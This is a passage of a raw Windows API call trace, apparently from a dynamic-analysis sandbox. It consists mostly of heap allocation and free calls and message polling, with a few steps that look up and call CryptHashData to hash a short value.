[0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0264.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.867] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.867] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bf8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0264.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.869] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0264.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.870] CryptHashData (hHash=0xa872d0, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51df0 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.870] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0264.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0264.871] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d48 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.871] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0264.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0264.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0264.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0264.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: 